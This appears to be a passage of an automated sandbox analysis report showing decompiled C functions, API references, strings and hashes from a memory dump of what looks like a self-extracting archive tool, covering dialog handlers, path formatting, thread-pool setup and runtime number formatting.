Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: f768ace1648dd83f86b1a0528a3e2351b825ac465edeea964d0a3eac23faef00
Instruction ID: 418d721e94ceba174a0bbf6741fd0f8c01847d884aae8f569b2645fd8c3859a8
Opcode Fuzzy Hash: f768ace1648dd83f86b1a0528a3e2351b825ac465edeea964d0a3eac23faef00
Instruction Fuzzy Hash: 31310A71908248AFEF11EB68DC01FFEBBB8AF29358F008055F445E7192DB744994CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0017A430, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0017A430(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t19;
				void* _t22;
				WCHAR** _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E0016130B(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0x1c0cb0 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0x1c0cb0), ( *0x1c0cb0)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_t19 = E0016BC85(__eflags,  *( *0x1c0cb0));
					_t22 = E001610F0(_t30, E0016DDD1(_t25, 0x8e),  *( *0x1c0cb0), _t19, 0);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0x1c0cb0));
					goto L13;
				}
				goto L6;
			}

0x0017a431
0x0017a436
0x0017a43b
0x0017a440
0x0017a458
0x0017a4e8
0x0017a4ea
0x00000000
0x0017a4ea
0x0017a45e
0x0017a464
0x0017a4d7
0x0017a4d9
0x0017a4df
0x0017a4e2
0x00000000
0x0017a4e2
0x0017a469
0x0017a47d
0x00000000
0x0017a47d
0x0017a46e
0x0017a471
0x0017a4cd
0x0017a4d3
0x0017a4b7
0x0017a4b8
0x00000000
0x0017a4b8
0x0017a473
0x0017a476
0x0017a4b5
0x00000000
0x0017a4b5
0x0017a47b
0x0017a48a
0x0017a4a3
0x0017a4a8
0x0017a4aa
0x00000000
0x00000000
0x0017a4b1
0x00000000
0x0017a4b1
0x00000000

APIs

Part of subcall function 0016130B: GetDlgItem.USER32(00000000,00003021), ref: 0016134F
Part of subcall function 0016130B: SetWindowTextW.USER32(00000000,001935B4), ref: 00161365

EndDialog.USER32(?,00000001), ref: 0017A4B8
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0017A4CD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0017A4E2

Strings

ASKNEXTVOL, xrefs: 0017A448

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 5689a4319e342c5f72cc4a76dbd25f8ab0dbb58e61ff65836f9f8c537c2b97d4
Instruction ID: 35160dbc6b730f558531a12a941987f6e0e09805519c881164c0c9a1bce9a508
Opcode Fuzzy Hash: 5689a4319e342c5f72cc4a76dbd25f8ab0dbb58e61ff65836f9f8c537c2b97d4
Instruction Fuzzy Hash: EB11D632248200BFD7219F589C4DF6A3BB9FF8A301F584041F306978A0C7A29951D726

Uniqueness

Uniqueness Score: -1.00%

Function 0016D1C3, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0016D1C3(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E00171596( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E0016FDFB(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E0016DD6B();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t16 = _t46 + 0x18; // 0x63
					_t18 = _t46 + 0x14; // 0x3248f10
					_t30 = E001858D9(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E0016CFE0);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0x19e158 +  *_t30 * 0xc; // 0x1946b8
						E00185F40( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
					L1:
					_t31 = 0;
				}
				return _t31;
			}

0x0016d1c3
0x0016d1c3
0x0016d1c3
0x0016d1c4
0x0016d1c8
0x0016d1cf
0x0016d1d5
0x0016d1e5
0x0016d1eb
0x0016d1ef
0x0016d1f2
0x0016d1fd
0x0016d1fd
0x0016d205
0x0016d208
0x0016d243
0x0016d20a
0x0016d20a
0x0016d20d
0x0016d222
0x0016d223
0x00000000
0x0016d20f
0x0016d212
0x0016d217
0x0016d218
0x0016d228
0x0016d22b
0x0016d22d
0x0016d22e
0x0016d233
0x0016d233
0x0016d212
0x0016d20d
0x0016d24f
0x0016d255
0x0016d259
0x0016d263
0x00000000
0x0016d269
0x0016d26f
0x0016d278
0x0016d280
0x0016d280
0x0016d1d7
0x0016d1d7
0x0016d1d7
0x0016d1d7
0x0016d287

APIs

__fprintf_l.LIBCMT ref: 0016D22E
_strncpy.LIBCMT ref: 0016D278

Strings

$%s, xrefs: 0016D223
@%s, xrefs: 0016D218

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: f49d92f9836bcf6b006aba3461ba5e097984656b0d1b5bf504ed1f7e37a4f34d
Instruction ID: a04825261ed826b27ecb03b5057d63895dc0f39176ec3801e5af1f5143c1c76f
Opcode Fuzzy Hash: f49d92f9836bcf6b006aba3461ba5e097984656b0d1b5bf504ed1f7e37a4f34d
Instruction Fuzzy Hash: 2921D572900208AFDF20EEA4DC06FEE7BA8EF15300F040516FE1496191D371DA65DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0017A990, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0017A990(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E0016130B(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E0016ECAD(_t24, 0x1b6a78,  &_v260);
					E0016ECF8( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0017a99a
0x0017a99e
0x0017a9a2
0x0017a9bb
0x0017aa2a
0x00000000
0x0017aa2c
0x0017a9bd
0x0017a9c3
0x0017aa24
0x00000000
0x0017aa24
0x0017a9c8
0x0017a9d7
0x00000000
0x0017a9d7
0x0017a9cd
0x0017a9d0
0x0017a9f6
0x0017aa08
0x0017aa15
0x0017aa1a
0x0017a9dd
0x0017a9de
0x00000000
0x0017a9de
0x0017a9d5
0x0017a9db
0x00000000
0x0017a9db
0x00000000

APIs

Part of subcall function 0016130B: GetDlgItem.USER32(00000000,00003021), ref: 0016134F
Part of subcall function 0016130B: SetWindowTextW.USER32(00000000,001935B4), ref: 00161365

EndDialog.USER32(?,00000001), ref: 0017A9DE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0017A9F6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0017AA24

Strings

GETPASSWORD1, xrefs: 0017A9A9

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 8f2e662d055f8b9152881a32c52eb81869a7f7460f1e1a41066b65ab7f2ec08d
Instruction ID: 66049ac653f055ad2c6e0f9b1196b7bc18101174e2e56b97440b3ce73b5af515
Opcode Fuzzy Hash: 8f2e662d055f8b9152881a32c52eb81869a7f7460f1e1a41066b65ab7f2ec08d
Instruction Fuzzy Hash: 6711E5339441287BDB219A649D09FFE7B7CEF99711F414011FB49B3490C37199A1D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0016B4F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0016B4F7(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				void* _t13;
				signed int _t14;
				short* _t20;
				void* _t23;
				signed short* _t27;
				signed int _t29;
				signed int _t31;

				_t20 = _a8;
				_t27 = _a4;
				 *_t20 = 0;
				_t10 = E0016B806(_t27);
				if(_t10 == 0) {
					_t29 = 0x5c;
					if( *_t27 == _t29 && _t27[1] == _t29) {
						_push(_t29);
						_push( &(_t27[2]));
						_t10 = E001815E8(__ecx);
						_pop(_t23);
						if(_t10 != 0) {
							_push(_t29);
							_push(_t10 + 2);
							_t13 = E001815E8(_t23);
							if(_t13 == 0) {
								_t14 = E001835B3(_t27);
							} else {
								_t14 = (_t13 - _t27 >> 1) + 1;
							}
							asm("sbb esi, esi");
							_t31 = _t29 & _t14;
							E00185842(_t20, _t27, _t31);
							_t10 = 0;
							 *((short*)(_t20 + _t31 * 2)) = 0;
						}
					}
					return _t10;
				}
				return E0016400A(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
			}

0x0016b4f8
0x0016b4ff
0x0016b504
0x0016b507
0x0016b50e
0x0016b52b
0x0016b52f
0x0016b53a
0x0016b53b
0x0016b53c
0x0016b542
0x0016b545
0x0016b54a
0x0016b54b
0x0016b54c
0x0016b555
0x0016b55f
0x0016b557
0x0016b55b
0x0016b55b
0x0016b569
0x0016b56b
0x0016b570
0x0016b578
0x0016b57a
0x0016b57a
0x0016b545
0x00000000
0x0016b57e
0x00000000

APIs

_swprintf.LIBCMT ref: 0016B51E

Part of subcall function 0016400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0016401D

_wcschr.LIBVCRUNTIME ref: 0016B53C
_wcschr.LIBVCRUNTIME ref: 0016B54C

Strings

%c:\, xrefs: 0016B514

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 52a14bbb02234a14c1108a4a2d3c068463ca632aee7c027317c7114e9082b154
Instruction ID: 4e8c2980dadfb9bc5fc008c0b239fb4acdcb9a52beb559e72b061180d25ab753
Opcode Fuzzy Hash: 52a14bbb02234a14c1108a4a2d3c068463ca632aee7c027317c7114e9082b154
Instruction Fuzzy Hash: 23012D53918311BACB206B759CC2CBBB7ACDFA67607504416F946C7081FB30D9A0C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 001706BA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E001706BA(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x41] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0x1a0f50);
					E00166E8C(E00166E91(_t19), 0x1a0f50, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}

0x001706ba
0x001706ba
0x001706c2
0x001706c6
0x001706c7
0x001706cb
0x001706cd
0x001706cd
0x001706d6
0x001706d8
0x001706d8
0x001706da
0x001706e2
0x001706e4
0x001706e4
0x001706e6
0x001706ec
0x001706f3
0x00170707
0x0017070d
0x00170713
0x0017071f
0x00170725
0x0017072f
0x0017073b
0x0017073b
0x00170741
0x00170749
0x0017074f
0x00170758

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0016ABC5,00000008,?,00000000,?,0016CB88,?,00000000), ref: 001706F3
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0016ABC5,00000008,?,00000000,?,0016CB88,?,00000000), ref: 001706FD
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0016ABC5,00000008,?,00000000,?,0016CB88,?,00000000), ref: 0017070D

Strings

Thread pool initialization failed., xrefs: 00170725

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 6e7d485ed915b9333c1ba6441fa2a102784d9ad2512b07a1e189db527000f8b6
Instruction ID: f1402f057a51f5c96d7157650c34ae222f8d7af68310a4d1c1d8ff6eca3110f4
Opcode Fuzzy Hash: 6e7d485ed915b9333c1ba6441fa2a102784d9ad2512b07a1e189db527000f8b6
Instruction Fuzzy Hash: 771170B1604708AFC3315F65DC84AA7FBECEB99755F10882EF1DE82200D7716980CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0017D38B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0017D38B(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _t16;
				_Unknown_base(*)()* _t19;
				int _t22;

				 *0x1bdc88 = _a12;
				 *0x1bdc8c = _a16;
				 *0x1a8464 = _a20;
				if( *0x1a8460 == 0) {
					if( *0x1a8453 == 0) {
						_t19 = E0017B8E0;
						_t16 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0x1a0ed4, _t16,  *0x1a8458, _t19, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0x1a0ed0, L"RENAMEDLG",  *0x1a844c, E0017CC90, _a4) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}

0x0017d398
0x0017d3a0
0x0017d3a8
0x0017d3ad
0x0017d3ba
0x0017d3c4
0x0017d3c9
0x0017d3f3
0x0017d40a
0x0017d40f
0x00000000
0x00000000
0x0017d3f1
0x00000000
0x00000000
0x0017d3f1
0x00000000
0x0017d415
0x00000000
0x0017d3be
0x00000000

Strings

REPLACEFILEDLG, xrefs: 0017D3C9, 0017D3FD
RENAMEDLG, xrefs: 0017D3DE

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 662b1d53e1c791659bec0c0dc0a942793e42e9c25ed21a72a05d9a1165192ad7
Instruction ID: d2fd859e2ec8b438581acec8ed6c31388d9db102de8d6ffe8824c8bcc8a277ae
Opcode Fuzzy Hash: 662b1d53e1c791659bec0c0dc0a942793e42e9c25ed21a72a05d9a1165192ad7
Instruction Fuzzy Hash: DC017171A04249AFDB158F28FD44F563FB9FB0E394B008425F40992A71DB729C90EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001891DE, Relevance: 6.3, APIs: 4, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E001891DE(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00183DD6(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E0017E4E0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E0017E4E0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E0017F350(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E0017E4E0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E0017E820();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E0017E820();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E0017E820();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E001894E1(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00191B20(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E0018895A();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00188839();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x001891de
0x001891e9
0x001891f0
0x001891f2
0x001891f2
0x001891f4
0x001891fd
0x001891ff
0x00189204
0x0018920a
0x00189220
